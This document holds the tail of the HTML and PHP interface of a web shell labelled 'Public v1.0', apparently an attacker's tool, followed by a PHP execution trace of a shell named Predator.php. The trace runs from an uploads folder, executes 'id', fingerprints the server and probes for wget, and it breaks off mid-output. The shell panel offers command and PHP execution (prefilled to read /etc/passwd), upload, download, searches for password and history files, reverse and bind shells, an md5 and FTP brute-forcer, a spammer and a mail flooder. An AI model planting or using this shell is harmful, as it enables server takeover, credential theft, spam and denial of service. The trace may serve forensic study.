</td></tr><tr><td height=5></td></tr><tr><td>
<center>
<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value=' Kill Shell ' onclick='kill()'>
</center>
</td></tr></table>
</td>
<td class='ram' width=45% valign=center align=center>
<table cellpadding=0 cellspacing=0>
<tr><td>
<table valign=top cellpadding=0 cellspacing=0>
<tr><td align=right>
<font size=2 color='#888888'>PHP-version:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>MySQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>MSSQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>PostgreSQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>Oracle:</font>
</td></tr>
</table>
</td><td>
<table valign=top cellpadding=0 cellspacing=0>
<tr><td>
<b><font size=2 color=red><?php
echo phpversion();
?></font></b>
</td></tr>
<tr><td>
<b><?php
echo testmysql();
?></b>
</td></tr>
<tr><td>
<b><?php
echo testmssql();
?></b>
</td></tr>
<tr><td>
<b><?php
echo postgresql();
?></b>
</td></tr>
<tr><td>
<b><?php
echo oracle();
?></b>
</td></tr>
</table>
</td><td width=4%></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top align=right>
<font color=#888888 size=2>Safe_mode:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>cURL:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>wget:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>fetch:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>lynx:</font>
</td></tr>
</table></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top>
<b><?php
echo safe_mode();
?></b>
</td></tr>
<tr><td valign=top>
<b><?php
echo testcurl();
?></b>
</td></tr>
<tr><td valign=top>
<b><?php
echo testwget();
?></b>
</td></tr>
<tr><td valign=top>
<b><?php
echo testfetch();
?></b>
</td></tr>
<tr><td valign=top>
<b><?php
echo testlynx();
?></b>
</td></tr>
</table></td>
<td width=4%></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top align=right>
<font color=#888888 size=2>Perl:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Server time:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Server date:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Total space:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Free space:</font>
</td></tr>
</table></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top>
<b><font size=2 color=green><?php
echo testperl();
?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php
echo date('H:i');
?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php
echo date('d-m-Y');
?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php
echo view_size(disk_total_space(getcwd()));
?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php
echo view_size(diskfreespace(getcwd()));
?></font></b>
</td></tr>
</table></td></tr>
</table>
</td></tr>
</table>
</td></tr>
<tr><td width=100% height=100% bgcolor='#333333' valign=top>
<table width=100%>
<tr><td valign=top align=center>
<table width=100% height=200 class='td1'>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<input type=hidden name="type" value=5>
<textarea cols=80 rows=13 name="value" class='ta'>
<?php
echo htmlspecialchars(shell());
?>
</textarea><?php
echo edit();
?></form>
</td>
<td valign=top align=left width=10%>
<table width=100% height=100% class='td2'>
<form action method=POST><tr><td valign=top align=left height=40% style="border-bottom: 1px solid #000000;">
<b>.::System shell::.</b><br>
<input type=hidden name="type" value=2>
<center><input type=text name="value" size=35 class='ta'></center>
</ br><center><input type=submit value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
</td></tr></form>
<tr><td valign=top align=left>
<form action method=POST>
<table>
<tr><td>
<b>.::PHP-code::.</b>
</td><td align=right>
<input type=submit value="Run code" class='bt'>
<input type=hidden name="type" value=1>
</td></tr>
<tr><td colspan=2>
<textarea rows=5 cols=26 name="value" class='ta'><?php
echo "readfile('/etc/passwd');";
?></textarea>
</td></tr>
</table></form>
</td></tr>
</table>
</td></tr>
</table>
<table>
<tr><td height=0></td></tr>
</table>
<table width=100% height=80 class='td1' valign=top>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::PWD::.</b>
</td><td align=right>
<input type=submit class='bt' value="cd">
<input type=hidden name="type" value=3>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=71 value=<?php
echo pwd();
?>>
</td></tr>
</table></form></td><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::File Edit::.</b>
</td><td align=right>
<input type=submit class='bt' value="Edit">
<input type=hidden name="type" value=4>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=72 value=<?php
echo pwd();
?>>
</td></tr>
</table></form>
</td></tr>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Download::.</b>
</td><td align=right>
<input type=submit class='bt' value="Download">
<input type=hidden name="type" value=11>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=71 value=<?php
echo pwd();
?>>
</td></tr>
</table></form></td><td valign=top align=left width=50%>
<form enctype="multipart/form-data" action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Upload::.</b>
</td><td align=right colspan=3>
<input type=submit class='bt' value="Upload">
<input type=hidden name="type" value=6>
</td></tr>
<tr><td colspan=2>
<font size=2 color=#888888>New name:</b>
<input type=text size=15 name="newname" class=ta>
</td><td width=4></td><td colspan=2>
<input type=file name="userfile" size=28>
</td></tr>
</table></form>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Alias::.</b>
</td><td align=right>
<input type=submit class='bt' value="RUN">
<input type=hidden name="type" value=7>
</td></tr>
<tr><td colspan=2>
<select name='value' class='ta' width=200>
<option>find apahce config file</option>
<option>find access_log files</option>
<option>find error_log files</option>
<option>find suid files</option>
<option>find suid files in current dir</option>
<option>find sgid files</option>
<option>find sgid files in current dir</option>
<option>find config.inc.php files</option>
<option>find config.inc.php files in current dir</option>
<option>find config* files</option>
<option>find config* files in current dir</option>
<option>find all writable files</option>
<option>find all writable files in current dir</option>
<option>find all writable directories</option>
<option>find all writable directories in current dir</option>
<option>find all writable directories and files</option>
<option>find all writable directories and files in current dir</option>
<option>find all service.pwd files</option>
<option>find service.pwd files in current dir</option>
<option>find all .htpasswd files</option>
<option>find .htpasswd files in current dir</option>
<option>find all .bash_history files</option>
<option>find .bash_history files in current dir</option>
<option>find all .mysql_history files</option>
<option>find .mysql_history files in current dir</option>
<option>find all .fetchmailrc files</option>
<option>find .fetchmailrc files in current dir</option>
<option>list file attributes on a Linux second extended file system</option>
<option>show opened ports</option>
<option>---------------------------------------------------------------------------------------------------------</option>
</select>
</td></tr>
</table></form></td>
<script>
function base64Encode(str)
{
var charBase64 = new Array(
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var len = str.length;
do
{
chr1 = str.charCodeAt(i++);
chr2 = str.charCodeAt(i++);
chr3 = str.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
enc4 = chr3 & 0x3F;
out += charBase64[enc1] + charBase64[enc2];
if (isNaN(chr2))
{
out += '==';
}
else if (isNaN(chr3))
{
out += charBase64[enc3] + '=';
}
else
{
out += charBase64[enc3] + charBase64[enc4];
}
}
while (i < len);
return out;
}
function base64Decode(str)
{
var indexBase64 = new Array(
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10, 11,12,13,14,
15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
var len = str.length;
do
{
enc1 = indexBase64[str.charCodeAt(i++)];
enc2 = indexBase64[str.charCodeAt(i++)];
enc3 = indexBase64[str.charCodeAt(i++)];
enc4 = indexBase64[str.charCodeAt(i++)];
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
out += String.fromCharCode(chr1);
if (enc3 != -1)
{
out += String.fromCharCode(chr2);
}
if (enc4 != -1)
{
out += String.fromCharCode(chr3);
}
}
while (i < len);
if (i != len)
{
new Error(BASE64_BROKEN);
return "";
}
return out;
}
</script>
<td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td width=1%>
<b>.::Base64_encode::.</b>
</td><td align=right width=6%>
<input type=button value="encode" class='bt' onclick='t.value=base64Encode(t.value)'>
</td>
<form action method=POST><td width=1%>
<b>.::Base64_decode::.</b>
</td><td align=right width=6%>
<input type=button value="decode" class='bt' onclick='n.value=base64Decode(n.value)'>
</td></tr>
<tr><td colspan=2>
<input type=text name='t' class='ta' size=34>
</td><td colspan=2>
<input type=text name='n' class='ta' size=34>
</td></tr>
</table></form>
</td></tr>
</td></tr>
</table>
</td></tr><tr></tr><tr><td>
<table cellpadding=0 cellspacing=0><tr><td>
<table class='td1' width=226>
<tr><td width=100% class='td2'>
<form action method=POST>
<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
<b>.::Back Connect::.</b></td></tr>
<tr><td width=100% height=10 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2><b>IP:</b></font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='ip' size=15 value=<?php
echo $_SERVER['REMOTE_ADDR'];
?>></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>port:</font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='port' size=10 value='5000'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
<td width=5%></td>
<td width=100% align=right>
<select class='ta' name='method'>
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=100% align=right colspan=3>
<input type=hidden name='type' value='12'>
<input type=submit value='Connect' class='bt'></form>
<tr><td width=100% height=5 colspan=3></td></tr>
</table>
</td></tr>
</table>
</td><td width=5></td><td>
<table class='td1' width=226>
<tr><td width=100% class='td2'>
<form action method=POST>
<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
<b>.::Bind port::.</b></td></tr>
<tr><td width=100% height=10 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2><b>Port:</b></font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='port' size=15 value='6000'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>pass:</font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='pass' size=10 value='hshell'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
<td width=5%></td>
<td width=100% align=right>
<select class='ta' name='method'>
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=100% align=right colspan=3>
<input type=hidden name='type' value='12'>
<input type=submit value='Bind' class='bt'></form>
<tr><td width=100% height=5 colspan=3></td></tr>
</table>
</td></tr>
</table>
</td><td width=5></td><td width=50% height=141>
<table class='td1' width=100% height=100% valign=top><tr><td width=100% height=100% class='td2' valign=top>
<table cellpadding=0 cellspacing=0 width=95%><tr><td colspan=4>
<b>.::md5 bruter::.</b>
</td></tr><tr><td height=10></td></tr>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right><b>hash:</b></font></td><td width=5></td><td align=right>
<input type=text name='hash' class='ta' size=50>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right>log_file:</font></td><td width=5></td><td align=right>
<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right>dictionary_file:</font></td><td width=5></td><td align=right>
<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
</td><td width=5></td><td align=right>
<input type=submit class='bt' value='Start Brute'>
</td></tr>
</table>
</td></tr></table>
</td></tr></table>
<tr></tr><tr><td>
<table class='td1' width=100% height=310 valign=top align=left>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td valign=top colspan=3 height=30>
<b>.::Spammer::.</b>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>emails_file:</b></font>
</td><td width=65% align=right>
<input type=text name='elist' class='ta' size=17 value="emails.txt">
</td></tr><tr><td height=5></td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>log_file:</b></font>
</td><td width=65% align=right>
<input type=text name='log' class='ta' size=17 value="mail_log.txt">
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>From:</font>
</td><td width=65% align=right>
<input type=text name='from' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Subject:</font>
</td><td width=65% align=right>
<input type=text name='subject' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Message:</font>
</td><td width=65% align=right>
<textarea name='msg' class='ta' cols=20 rows=4></textarea>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Check<sup>*</sup>:</font>
</td><td width=65% align=right>
<input type=text name='check' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
</td><td width=65% align=right>
<input type=submit class='bt' value="Start">
<input type=hidden name='type' value=10>
</td></tr>
</table></form>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td colspan=3 height=30 valign=top><b>.::FTP-Brute::.</b></td></tr>
<tr><td width=31% align=right>
<font color=#888888 size=2><b>Host:</b></font>
</td><td align=right>
<input type=text name='host' class='ta' size=28>
</td><td width=5%></td></tr><tr><td height=35 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_users file:</font>
</td><td align=right>
<input type=text name='users' class='ta' size=17 value="ftp_users.txt">
</td><td></td></tr>
<tr><td height=5 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_passwd file:</font>
</td><td align=right>
<input type=text name='passwd' class='ta' size=17 value="ftp_passwds.txt">
</td><td></td></tr>
<tr><td height=5 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_log file:</font>
</td><td align=right>
<input type=text name='log' class='ta' size=17 value="ftp_log.txt">
</td><td></td></tr>
<tr><td colspan=2 height=20></td></tr>
<tr><td colspan=2 align=right>
<input type=submit class='bt' value="Start Brute">
<input type=hidden name="type" value=9>
</td></tr>
</td></table></form>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td valign=top colspan=3 height=30>
<b>.::Flooder::.</b>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>log_file:</b></font>
</td><td width=65% align=right>
<input type=text name='log' class='ta' size=17 value="mflood_log.txt">
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Send to:</font>
</td><td width=65% align=right>
<input type=text name='to' class='ta' size=27>
</td></tr><tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>From:</font>
</td><td width=65% align=right>
<input type=text name='from' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Subject:</font>
</td><td width=65% align=right>
<input type=text name='subject' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Message:</font>
</td><td width=65% align=right>
<textarea name='msg' class='ta' cols=20 rows=4></textarea>
</td></tr>
<td height=25><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Amount:</font>
</td><td width=65% align=right>
<input type=text name='amount' class='ta' size=17>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Check<sup>*</sup>:</font>
</td><td width=65% align=right>
<input type=text name='check' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
</td><td width=65% align=right>
<input type=submit class='bt' value="Flood">
<input type=hidden name='type' value=10>
</td></tr>
</table></form>
</td></tr>
</table>
</td></tr>
</table>
</td></tr>
</table></center>
<center><font size=1 color=#444444>.:[Public v1.0]:.</font></center>
</body>
</html>
<!-- Coded by LoFFi & Ls01r //-->Execution traces
data/traces/9a71dafe76c34fc36b0d8c8bbdf7165e_trace-1676255519.3077.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:32:25.205477]
1 0 1 0.000156 393528
1 3 0 0.000977 610616 {main} 1 /var/www/html/uploads/Predator.php 0 0
1 A /var/www/html/uploads/Predator.php 2 $auth = 0
2 4 0 0.001008 610616 ini_set 0 /var/www/html/uploads/Predator.php 6 2 'session.gc_maxlifetime' 1
2 4 1 0.001026 610720
2 4 R '1440'
2 5 0 0.001040 610616 session_start 0 /var/www/html/uploads/Predator.php 7 0
2 5 1 0.001094 611368
2 5 R TRUE
2 6 0 0.001109 611368 error_reporting 0 /var/www/html/uploads/Predator.php 8 1 0
2 6 1 0.001123 611408
2 6 R 22527
2 7 0 0.001137 611368 safe_mode 1 /var/www/html/uploads/Predator.php 9 0
3 8 0 0.001152 611368 ex 1 /var/www/html/uploads/Predator.php 435 1 'echo abch0ld'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 9 0 0.001176 611368 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 9 1 0.001190 611408
4 9 R TRUE
4 10 0 0.001203 611392 exec 0 /var/www/html/uploads/Predator.php 452 2 'echo abch0ld' ''
4 10 1 0.001978 611896
4 10 R 'abch0ld'
4 11 0 0.002004 611800 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => 'abch0ld']
4 11 1 0.002021 611864
4 11 R 'abch0ld'
3 A /var/www/html/uploads/Predator.php 453 $out = 'abch0ld'
3 8 1 0.002047 611400
3 8 R 'abch0ld'
3 12 0 0.002061 611400 strpos 0 /var/www/html/uploads/Predator.php 435 2 'abch0ld' 'h0ld'
3 12 1 0.002075 611472
3 12 R 3
2 A /var/www/html/uploads/Predator.php 440 _SESSION['safe_mode'] = 0
2 7 1 0.002102 611688
1 A /var/www/html/uploads/Predator.php 10 $name = '9b534ea55d0b82c3a7e80003a84b6865'
1 A /var/www/html/uploads/Predator.php 11 $pass = 'a029d0df84eb5549c641e04a9ef389e5'
2 13 0 0.002139 611688 getsystem 1 /var/www/html/uploads/Predator.php 702 0
3 14 0 0.002151 611688 php_uname 0 /var/www/html/uploads/Predator.php 575 1 's'
3 14 1 0.002166 611752
3 14 R 'Linux'
3 15 0 0.002179 611720 php_uname 0 /var/www/html/uploads/Predator.php 575 1 'r'
3 15 1 0.002192 611800
3 15 R '5.15.0-60-generic'
3 16 0 0.002206 611744 php_uname 0 /var/www/html/uploads/Predator.php 575 1 'v'
3 16 1 0.002219 611856
3 16 R '#66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 13 1 0.002235 611784
2 13 R 'Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 17 0 0.002253 611688 getserver 1 /var/www/html/uploads/Predator.php 708 0
3 18 0 0.002265 611688 getenv 0 /var/www/html/uploads/Predator.php 580 1 'SERVER_SOFTWARE'
3 18 1 0.002280 611768
3 18 R 'Apache/2.4.52 (Ubuntu)'
2 17 1 0.002295 611736
2 17 R 'Apache/2.4.52 (Ubuntu)'
2 19 0 0.002310 611688 getuser 1 /var/www/html/uploads/Predator.php 714 0
3 20 0 0.002322 611688 get_current_user 0 /var/www/html/uploads/Predator.php 586 0
3 20 1 0.002359 611728
3 20 R 'osboxes'
2 A /var/www/html/uploads/Predator.php 586 $out = 'osboxes'
3 21 0 0.002388 611728 ex 1 /var/www/html/uploads/Predator.php 589 1 'id'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 22 0 0.002443 611728 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 22 1 0.002457 611768
4 22 R TRUE
4 23 0 0.002470 611752 exec 0 /var/www/html/uploads/Predator.php 452 2 'id' ''
4 23 1 0.005312 612352
4 23 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 24 0 0.005349 612208 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
4 24 1 0.005368 612272
4 24 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 A /var/www/html/uploads/Predator.php 453 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 21 1 0.005398 611808
3 21 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/Predator.php 589 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 19 1 0.005427 611776
2 19 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 25 0 0.005445 611696 pwd 1 /var/www/html/uploads/Predator.php 720 0
3 26 0 0.005470 611696 chdir 0 /var/www/html/uploads/Predator.php 600 1 NULL
3 26 1 0.005494 611784
3 26 R FALSE
3 27 0 0.005509 611744 getcwd 0 /var/www/html/uploads/Predator.php 601 0
3 27 1 0.005522 611792
3 27 R '/var/www/html/uploads'
2 A /var/www/html/uploads/Predator.php 601 $cwd = '/var/www/html/uploads'
3 28 0 0.005547 611792 strrpos 0 /var/www/html/uploads/Predator.php 602 2 '/var/www/html/uploads' '/'
3 28 1 0.005561 611864
3 28 R 13
2 A /var/www/html/uploads/Predator.php 602 $u = 13
2 25 1 0.005585 611792
2 25 R '/var/www/html/uploads/'
1 A /var/www/html/uploads/Predator.php 720 $u = '/var/www/html/uploads/'
2 29 0 0.005612 611792 phpversion 0 /var/www/html/uploads/Predator.php 763 0
2 29 1 0.005624 611856
2 29 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 30 0 0.005640 611792 testmysql 1 /var/www/html/uploads/Predator.php 766 0
3 31 0 0.005652 611792 function_exists 0 /var/www/html/uploads/Predator.php 426 1 'mysql_connect'
3 31 1 0.005666 611832
3 31 R FALSE
2 30 1 0.005679 611792
2 30 R '<font size=2 color=red>OFF</font>'
2 32 0 0.005695 611792 testmssql 1 /var/www/html/uploads/Predator.php 769 0
3 33 0 0.005707 611792 function_exists 0 /var/www/html/uploads/Predator.php 408 1 'mssql_connect'
3 33 1 0.005720 611832
3 33 R FALSE
2 32 1 0.005733 611792
2 32 R '<font size=2 color=red>OFF</font>'
2 34 0 0.005749 611792 postgresql 1 /var/www/html/uploads/Predator.php 772 0
3 35 0 0.005760 611792 function_exists 0 /var/www/html/uploads/Predator.php 398 1 'pg_connect'
3 35 1 0.005774 611832
3 35 R FALSE
2 34 1 0.005786 611792
2 34 R '<font size=2 color=red>OFF</font>'
2 36 0 0.005802 611792 oracle 1 /var/www/html/uploads/Predator.php 775 0
3 37 0 0.005813 611792 function_exists 0 /var/www/html/uploads/Predator.php 388 1 'ocilogon'
3 37 1 0.005826 611832
3 37 R FALSE
2 36 1 0.005839 611792
2 36 R '<font size=2 color=red>OFF</font>'
2 38 0 0.005854 611792 safe_mode 1 /var/www/html/uploads/Predator.php 798 0
3 39 0 0.005867 611792 ex 1 /var/www/html/uploads/Predator.php 435 1 'echo abch0ld'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 40 0 0.005890 611792 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 40 1 0.005904 611832
4 40 R TRUE
4 41 0 0.005917 611816 exec 0 /var/www/html/uploads/Predator.php 452 2 'echo abch0ld' ''
4 41 1 0.006565 612320
4 41 R 'abch0ld'
4 42 0 0.006593 612224 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => 'abch0ld']
4 42 1 0.006611 612288
4 42 R 'abch0ld'
3 A /var/www/html/uploads/Predator.php 453 $out = 'abch0ld'
3 39 1 0.006637 611824
3 39 R 'abch0ld'
3 43 0 0.006651 611824 strpos 0 /var/www/html/uploads/Predator.php 435 2 'abch0ld' 'h0ld'
3 43 1 0.006666 611896
3 43 R 3
2 A /var/www/html/uploads/Predator.php 440 _SESSION['safe_mode'] = 0
2 38 1 0.006693 611792
2 38 R '<font size=2 color=red>OFF</font>'
2 44 0 0.006711 611792 testcurl 1 /var/www/html/uploads/Predator.php 801 0
3 45 0 0.006724 611792 function_exists 0 /var/www/html/uploads/Predator.php 417 1 'curl_version'
3 45 1 0.006738 611832
3 45 R TRUE
2 44 1 0.006751 611792
2 44 R '<font size=2 color=green>ON</font>'
2 46 0 0.006776 611904 testwget 1 /var/www/html/uploads/Predator.php 804 0
3 47 0 0.006789 611904 ex 1 /var/www/html/uploads/Predator.php 378 1 'wget --help'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 48 0 0.006812 611904 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 48 1 0.006826 611944
4 48 R TRUE
4 49 0 0.006838 611928 exec 0 /var/www/html/uploads/Predator.php 452 2 'wget --help' ''
4 49 1 0.009793 644464
4 49 R 'and/or open issues at https://savannah.gnu.org/bugs/?func=additem&group=wget.'
4 50 0 0.009851 644288 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => 'GNU Wget 1.21.2, a non-interactive network retriever.', 1 => 'Usage: wget [OPTION]... [URL]...', 2 => '', 3 => 'Mandatory arguments to long options are mandatory for short options too.', 4 => '', 5 => 'Startup:', 6 => ' -V, --version display the version of Wget and exit', 7 => ' -h, --help print this help', 8 => ' -b, --background go to background after startup', 9 => ' -e, --execute=COMMAND execute a `.wgetrc\'-style command', 10 => '', 11 => 'Logging and input file:', 12 => ' -o, --output-file=FILE log messages to FILE', 13 => ' -a, --append-output=FILE append messages to FILE', 14 => ' -d, --debug print lots of debugging information', 15 => ' -q, --quiet quiet (no output)', 16 => ' -v, --verbose be verbose (this is the default)', 17 => ' -nv, --no-verbose turn off verboseness, without being quiet', 18 => ' --report-speed=TYPE output bandwidth as TYPE. TYPE can be bits', 19 => ' -i, --input-file=FILE download URLs found in local or external FILE', 20 => ' -F, --force-html treat input file as HTML', 21 => ' -B, --base=URL resolves HTML input-file links (-i -F)', 22 => ' relative to URL', 23 => ' --config=FILE specify config file to use', 24 => ' --no-config do not read any config file', 25 => ' --rejected-log=FILE log reasons for URL rejection to FILE', 26 => '', 27 => 'Download:', 28 => ' -t, --tries=NUMBER set number of retries to NUMBER (0 unlimits)', 29 => ' --retry-connrefused retry even if connection is refused', 30 => ' --retry-on-http-error=ERRORS comma-separated list of HTTP errors to retry', 31 => ' -O, --output-document=FILE write documents to FILE', 32 => ' -nc, --no-clobber skip downloads that would download to', 33 => ' existing files (overwriting them)', 34 => ' --no-netrc don\'t try to obtain credentials from .netrc', 35 => ' -c, --continue resume getting a partially-downloaded file', 36 => ' --start-pos=OFFSET start downloading from zero-based position OFFSET', 37 => ' 